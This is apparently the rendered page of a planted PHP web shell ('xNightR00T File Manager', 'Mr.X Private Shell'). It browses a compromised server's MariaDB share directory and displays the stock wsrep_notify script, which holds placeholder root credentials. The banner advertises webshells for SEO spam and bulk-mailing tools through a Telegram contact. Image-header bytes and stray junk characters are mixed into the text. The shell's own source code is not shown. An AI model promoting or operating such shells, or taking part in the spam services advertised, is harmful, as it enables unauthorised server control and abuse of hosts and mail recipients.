xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#!/bin/sh -eu

# This is a simple example of wsrep notification script (wsrep_notify_cmd).
# It will create 'wsrep' schema and two tables in it: 'membeship' and 'status'
# and fill them on every membership or node status change.
#
# Edit parameters below to specify the address and login to server.

USER=root
PSWD=rootpass
HOST=127.0.0.1
PORT=3306

SCHEMA="wsrep"
MEMB_TABLE="$SCHEMA.membership"
STATUS_TABLE="$SCHEMA.status"

BEGIN="
SET wsrep_on=0;
DROP SCHEMA IF EXISTS $SCHEMA; CREATE SCHEMA $SCHEMA;
CREATE TABLE $MEMB_TABLE (
    idx  INT UNIQUE PRIMARY KEY,
    uuid CHAR(40) UNIQUE, /* node UUID */
    name VARCHAR(32),     /* node name */
    addr VARCHAR(256)     /* node address */
) ENGINE=MEMORY;
CREATE TABLE $STATUS_TABLE (
    size   INT,      /* component size   */
    idx    INT,      /* this node index  */
    status CHAR(16), /* this node status */
    uuid   CHAR(40), /* cluster UUID */
    prim   BOOLEAN   /* if component is primary */
) ENGINE=MEMORY;
BEGIN;
DELETE FROM $MEMB_TABLE;
DELETE FROM $STATUS_TABLE;
"
END="COMMIT;"

configuration_change()
{
    echo "$BEGIN;"

    local idx=0

    for NODE in $(echo $MEMBERS | sed s/,/\ /g)
    do
        echo "INSERT INTO $MEMB_TABLE VALUES ( $idx, "
        # Don't forget to properly quote string values
        echo "'$NODE'" | sed  s/\\//\',\'/g
        echo ");"
        idx=$(( $idx + 1 ))
    done

    echo "INSERT INTO $STATUS_TABLE VALUES($idx, $INDEX, '$STATUS', '$CLUSTER_UUID', $PRIMARY);"

    echo "$END"
}

status_update()
{
    echo "SET wsrep_on=0; BEGIN; UPDATE $STATUS_TABLE SET status='$STATUS'; COMMIT;"
}

COM=status_update # not a configuration change by default

while [ $# -gt 0 ]
do
    case $1 in
    --status)
        STATUS=$2
        shift
        ;;
    --uuid)
        CLUSTER_UUID=$2
        shift
        ;;
    --primary)
        [ "$2" = "yes" ] && PRIMARY="1" || PRIMARY="0"
        COM=configuration_change
        shift
        ;;
    --index)
        INDEX=$2
        shift
        ;;
    --members)
        MEMBERS=$2
        shift
        ;;
    esac
    shift
done

# Undefined means node is shutting down
if [ "$STATUS" != "Undefined" ]
then
    $COM | mysql -B -u$USER -p$PSWD -h$HOST -P$PORT
fi

exit 0
#

Filemanager

Name Type Size Permission Actions
charsets Folder 0755
czech Folder 0755
danish Folder 0755
dutch Folder 0755
english Folder 0755
estonian Folder 0755
french Folder 0755
german Folder 0755
greek Folder 0755
hindi Folder 0755
hungarian Folder 0755
italian Folder 0755
japanese Folder 0755
korean Folder 0755
norwegian Folder 0755
norwegian-ny Folder 0755
policy Folder 0755
polish Folder 0755
portuguese Folder 0755
romanian Folder 0755
russian Folder 0755
serbian Folder 0755
slovak Folder 0755
spanish Folder 0755
swedish Folder 0755
systemd Folder 0755
ukrainian Folder 0755
binary-configure File 1.13 KB 0755
errmsg-utf8.txt File 528.38 KB 0644
fill_help_tables.sql File 570.14 KB 0644
install_spider.sql File 14.95 KB 0644
magic File 1.3 KB 0644
maria_add_gis_sp.sql File 1.61 KB 0644
maria_add_gis_sp_bootstrap.sql File 1.59 KB 0644
my-huge.cnf File 4.77 KB 0644
my-innodb-heavy-4G.cnf File 19.59 KB 0644
my-large.cnf File 4.75 KB 0644
my-medium.cnf File 4.77 KB 0644
my-small.cnf File 2.74 KB 0644
mysql-log-rotate File 868 B 0755
mysql.server File 11.9 KB 0755
mysql_performance_tables.sql File 1.91 KB 0644
mysql_system_tables.sql File 26.97 KB 0644
mysql_system_tables_data.sql File 4.41 KB 0644
mysql_test_data_timezone.sql File 10.17 KB 0644
mysql_to_mariadb.sql File 1.18 KB 0644
mysqld_multi.server File 1.04 KB 0755
wsrep.cnf File 3.39 KB 0644
wsrep_notify File 2.18 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1